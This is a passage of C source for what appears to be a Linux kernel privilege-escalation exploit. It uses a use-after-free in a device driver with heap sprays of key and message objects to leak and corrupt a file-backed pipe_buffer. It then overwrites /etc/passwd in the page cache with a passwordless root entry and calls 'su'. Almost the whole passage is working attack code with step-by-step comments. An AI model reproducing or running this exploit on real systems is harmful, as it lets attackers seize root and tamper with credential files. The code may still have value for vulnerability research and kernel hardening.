    const int rc = close(ptmx[i]);

    if (rc >= 0) {
        return;
    }
    errExit("[X] free tty");
}

/*
 * Heuristic: true when every bit of KERNEL_MASK is set in `val` and `val`
 * is not the all-ones pattern.
 */
static bool is_kernel_ptr(uint64_t val)
{
    if (val == 0xffffffffffffffff) {
        return false;
    }
    return (val & KERNEL_MASK) == KERNEL_MASK;
}

/*
 * Heuristic: true when every bit of HEAP_MASK is set in `val`, `val` does
 * not also match KERNEL_MASK, and `val` is not the all-ones pattern.
 */
static bool is_heap_ptr(uint64_t val)
{
    if (val == 0xffffffffffffffff) {
        return false;
    }
    if ((val & KERNEL_MASK) == KERNEL_MASK) {
        return false;
    }
    return (val & HEAP_MASK) == HEAP_MASK;
}

/* printf-style status message on stdout, prefixed with "[+] ". */
void info(const char *format, ...) {
    va_list ap;

    fputs("[+] ", stdout);

    va_start(ap, format);
    vprintf(format, ap);
    va_end(ap);
}

/* printf-style failure message on stdout, prefixed with "[x] ". */
void error(const char *format, ...) {
    va_list ap;

    fputs("[x] ", stdout);

    va_start(ap, format);
    vprintf(format, ap);
    va_end(ap);
}

/*
 * Thin wrapper around the add_key system call.
 *
 * Returns the serial of the new key. Terminates the process when the system
 * call fails. (The function previously ended without a return statement, so
 * callers read an indeterminate value.)
 */
static inline key_serial_t add_key(const char *type, const char *description, const void *payload, size_t plen, key_serial_t ringid) {
    long ret = syscall(__NR_add_key, type, description, payload, plen, ringid);
    if (ret < 0) {
        errExit("add_key");
    }
    return (key_serial_t)ret;
}

/*
 * Thin wrapper around the keyctl system call; forwards all arguments and
 * hands back the raw result without any error handling.
 */
static inline long keyctl(int operation, unsigned long arg2, unsigned long arg3, unsigned long arg4, unsigned long arg5) {
    const long rc = syscall(__NR_keyctl, operation, arg2, arg3, arg4, arg5);

    return rc;
}

/*
 * Revoke `key` and unlink it from the process keyring.
 *
 * Returns the result of the final keyctl() call (non-negative, since any
 * failure terminates the process). The function previously ended without a
 * return statement.
 */
static long free_key(key_serial_t key) {

    long ret = keyctl(KEYCTL_REVOKE, key, 0, 0, 0);

    if (ret < 0) {
        errExit("keyctl revoke");
    }

    ret = keyctl(KEYCTL_UNLINK, key, KEY_SPEC_PROCESS_KEYRING, 0, 0);

    if (ret < 0) {
        errExit("keyctl unlink");
    }

    return ret;
}

/*
 * Add a "user" key named "payload_<id>" to the process keyring.
 *
 * id:   number used to build a unique key description.
 * buf:  payload source, or NULL to fill the payload with 0x41 bytes.
 * size: intended total size including the user_key_payload header; the
 *       header size is subtracted to obtain the payload length.
 *
 * Returns the serial of the new key. Terminates the process when `size` is
 * smaller than the header, when the payload would not fit the 0x400-byte
 * staging buffer, or when add_key() fails.
 */
static int alloc_key(int id, char *buf, size_t size)
{
    char desc[0x400] = { 0 };
    char payload[0x400] = {0};
    int key;

    /* reject sizes that would wrap around or overflow the staging buffer */
    if (size < sizeof(struct user_key_payload) ||
        size - sizeof(struct user_key_payload) > sizeof(payload)) {
        errno = EINVAL;
        errExit("alloc_key size");
    }

    size -= sizeof(struct user_key_payload);

    snprintf(desc, sizeof(desc), "payload_%d", id);

    if (!buf) {
        memset(payload, 0x41, size);
    }
    else {
        memcpy(payload, buf, size);
    }

    key = add_key("user", desc, payload, size, KEY_SPEC_PROCESS_KEYRING);

    if (key < 0)
	{
        errExit("add_key");
	}

    return key;
}

/*
 * Create a pipe and store its two descriptors in pipes[i].
 *
 * Terminates the process when pipe() fails, like the other helpers in this
 * file; continuing would leave pipes[i] zeroed and make later reads and
 * writes hit descriptor 0.
 */
void alloc_pipe_buf(int i)
{
    if (pipe(pipes[i]) < 0) {
        errExit("[X] alloc_pipe_buff()");
    }
}

/*
 * Close both descriptors of pipes[i], first index 0 and then index 1.
 * Terminates the process on the first close() that fails.
 */
void release_pipe_buf(int i)
{
    for (int end = 0; end < 2; end++) {
        if (close(pipes[i][end]) < 0) {
            errExit("[X] release_pipe_buf");
        }
    }
}

int main(int argc, char** argv)
{
    int fd1;
    int fd2;
    int fd3;
    int fd4;
    int ret;
    uint8_t buf[0x10000];

    for (int i = 0x0; i < 0x10; i++) {
        alloc_pipe_buf(i);
        write(pipes[i][1], "hello", 5);
    }

    fd1 = open(DEV_PATH, O_RDONLY);
    fd2 = open(DEV_PATH, O_RDONLY);

    if (fd1 < 0 || fd2 < 0) {
        errExit("open");
    }

    close(fd1);

    info("spraying userkey structs \n");

    // allocated user_key_payload in place of freed struct
    for (int i = 0; i < 0x10; i++) {
        keys[i] = alloc_key(n_keys++, 0, 800);
    }

    info("closing second fd \n");
    // free user_key_payload
    close(fd2);

    info("Spraying msg ojects \n");
    // spray msg objects, corrupt userkey payload
    for (int i = 0; i < 0x40;i++) {
        alloc_qid(i);
        send_msg(qids[i], 0xff, 0x400, 0);
    }

    memset(buf, 0x0, sizeof(buf));
    uint64_t* p_buf = (uint64_t*)buf;

    int fd_passwd = open("/etc/passwd", O_RDONLY);
    if (fd_passwd < 0) {
        errExit("open /etc/passwd");
    }

    // call splice on the initial sprayed pipes, causing file-backed pipe_buffer to be allocated.
    // we will leak these pointers later
    for (int i = 0; i < 0x10; i++) {
        ret = splice(fd_passwd, NULL, pipes[i][1], NULL, 1 ,0);
        if (ret  < 0) {
            errExit("splice");
        }
    }

    // search corrupted user_key_payload for oor
    int corrupted_userkey = 0x0;
    for (int i = 0; i < 0x10; i++) {
        ret = keyctl(KEYCTL_READ, keys[i], buf, sizeof(buf), 0);
        if (ret == sizeof(buf)-1) {
            corrupted_userkey = i;
            info("Found corrupted userkey payload \n");
            break;
        }
        if (ret < 0) {
            errExit("keyctl read");
        }
    }

    // search file backed pipe_buffer struct
    int pipe_idx = 0x0;
    for (int i = 0; i < sizeof(buf) / sizeof(uint64_t); i++) {
        pipe_buf_t* initial_buf = (pipe_buf_t*)&p_buf[i];
        pipe_buf_t* file_backed_buf = (pipe_buf_t*)&p_buf[i+5];
        if (is_heap_ptr(initial_buf->page) && is_kernel_ptr(initial_buf->ops) &&
            is_heap_ptr(file_backed_buf->page) && is_kernel_ptr(file_backed_buf->ops)) {

            // len == 5 because we wrote 5 bytes (hello) to the pipes
            if (initial_buf->len == 5 && initial_buf->flags == 0x10 && file_backed_buf->flags == 0) {
                pipe_idx = i+5;
                print_hex8(initial_buf, 0x50);
                break;
            }
        }
    }

    if (pipe_idx == 0x0) {
        printf("Unable to find pipe \n");
        return 0;
    }

    for (int i = 0; i < 0x10; i++) {
        if (i != corrupted_userkey) {
            free_key(keys[i]);
        }
    }

    fd3 = open(DEV_PATH, O_RDONLY);
    fd4 = open(DEV_PATH, O_RDONLY);

    if (fd3 < 0  || fd4 < 0) {
        errExit("fd3 / fd4");
    }

    close(fd3);

    for (int i = 0x10; i < 0x20; i++) {
        alloc_pipe_buf(i);
        write(pipes[i][1], "hello", 5);
    }

    // create more file backed pipe_bufs, one of them we will corrupt
    for (int i = 0x10; i < 0x20; i++) {
        ret = splice(fd_passwd, NULL, pipes[i][1], NULL, 1 ,0);
        if (ret  < 0 || ret == 0) {
            errExit("splice");
        }
    }

    pipe_buf_t *pipe = (pipe_buf_t*)&p_buf[pipe_idx];
    info("Pipe data: %p %p %lx \n", pipe->page, pipe->ops, pipe->flags);

    // set PIPE_BUF_FLAG_CAN_MERGE flag on file backed pipe_buf
    pipe->flags = 0x10;
    pipe->len = 0x0;
    pipe->offset = 0x0;

    // UAF pipe buf
    close(fd4);

    char msg_msg_buf[0x2000] = {0};

    /*** Method 1: corrupt using msg_msg struct ***/
    // -4 since the first 8 byte will be written by msg_msg_seg->next
    memcpy(&msg_msg_buf[PAGE_SZ - sizeof(msg_msg_t)], &p_buf[pipe_idx-4], 0x100);
    for (int i = 0x40; i < 0x50; i++) {
        alloc_qid(i);
        //send_msg(qids[i], 0x41, 0x400, 0);
        send_msg_payload(qids[i], msg_msg_buf, PAGE_SZ + 0x400, 0x0);
    }

    /*** Method 2: corrupt using user_key_payload struct ***/
    /*
    for (int i = 0x0; i < 0x10; i++) {
        if (i == corrupted_userkey) {
            continue;
        }
        // pipe_idx-2 since user_key_payload takes up 24 bytes so we corrupt starting
        // from pipe->flags member of the initial pipe_buf in the ringbuffer
        // (so 16 byte left of that struct before we can corrupt file backed)
        keys[i] = alloc_key(n_keys++, &p_buf[pipe_idx-2], 800);
    }
    */

    const char *const data = "root::0:0:root:/root:/bin/sh\n";
    for (int i = 0x10; i < 0x20; i++) {
        ret = write(pipes[i][1], data, strlen(data));
        //read(pipes[i][0], buf, 0x400);
    }

    info("Calling system \n");
    system("cat /etc/passwd");
    system("su");

    WAIT();
}